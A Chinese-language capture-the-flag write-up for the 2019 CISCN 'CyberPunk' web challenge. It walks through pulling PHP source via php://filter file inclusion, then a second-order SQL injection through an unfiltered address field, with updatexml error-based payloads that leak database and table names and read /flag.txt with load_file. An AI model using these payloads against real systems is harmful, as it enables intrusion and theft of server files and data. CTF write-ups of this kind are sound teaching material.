> For the complete documentation index, see [llms.txt](https://gitbook-88.gitbook.io/ctf-writeup/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gitbook-88.gitbook.io/ctf-writeup/2019/2019-ciscn/hua-bei-sai-qu-cyberpunk.md).

# \[华北赛区]CyberPunk

查看源码发现存在文件包含，把文件包拉下来：

```
/?file=php://filter/read=convert.base64-encode/resource=index.php
/?file=php://filter/read=convert.base64-encode/resource=search.php
/?file=php://filter/read=convert.base64-encode/resource=change.php
/?file=php://filter/read=convert.base64-encode/resource=delete.php
```

审计代码，发现在关键查询处的代码，只对用户名和电话号码进行了严格的审计，忽略了对地址的审计。

```
if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
```

```
$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
```

其中的`’old_address’=’”.$row[‘address’].”`用了一开始的地址，导致恶意拼接。

将一下代码写入地址，爆库名：

```
1' where user_id=updatexml(1,concat(0x7e,(select substr(database(),1,20)),0x7e),1)#
```

爆表名：

```
1' where user_id=updatexml(1,concat(0x7e,(select substr(table_name,1,20)from information_schema.tables where table_schema='ctfusers'),0x7e),1)#
```

后面就爆不出了，看了wp，发现只要读取文件就可以了。

最后读文件出了

```
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)#
```

```
1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#
```
